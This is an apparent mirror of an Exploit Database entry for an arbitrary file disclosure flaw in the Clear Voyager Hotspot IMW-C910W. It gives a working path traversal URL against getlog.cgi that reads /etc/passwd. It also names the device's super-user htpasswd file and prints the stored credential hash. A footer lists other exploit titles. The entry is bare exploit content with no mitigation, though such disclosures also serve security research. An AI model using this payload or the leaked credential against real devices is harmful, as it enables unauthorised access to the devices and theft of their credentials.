Clear Voyager Hotspot IMW-C910W – Arbitrary File Disclosure

Exploit Database
20 阅读

作者： Damaster

日期： 2016-07-15
类别：
- webapps
平台：
- cgi
来源：https://www.exploit-db.com/exploits/40112/

- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-
- vulnerable Device Software Version : R4383
-
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================

last Exploits
Clear Voyager Hotspot IMW-C910W – Arbitrary File Disclosure的更多信息

Openfire 3.10.2 – Unrestricted Arbitrary File Upload：
DotNetNuke 07.04.00 – Administration Authentication Bypass：
Extreme Mobster – ‘login’ Cross-Site Scripting：
D-Link DIR-615 Wireless Router – Persistent Cross-Site Scripting：
webpa 1.1.0.1 – Multiple Vulnerabilities：
MESSOA IP Cameras (Multiple Models) – Password Change：
AdaptCMS 2.0 – SQL Injection：
ADOdb < 4.71 - Cross Site Scripting：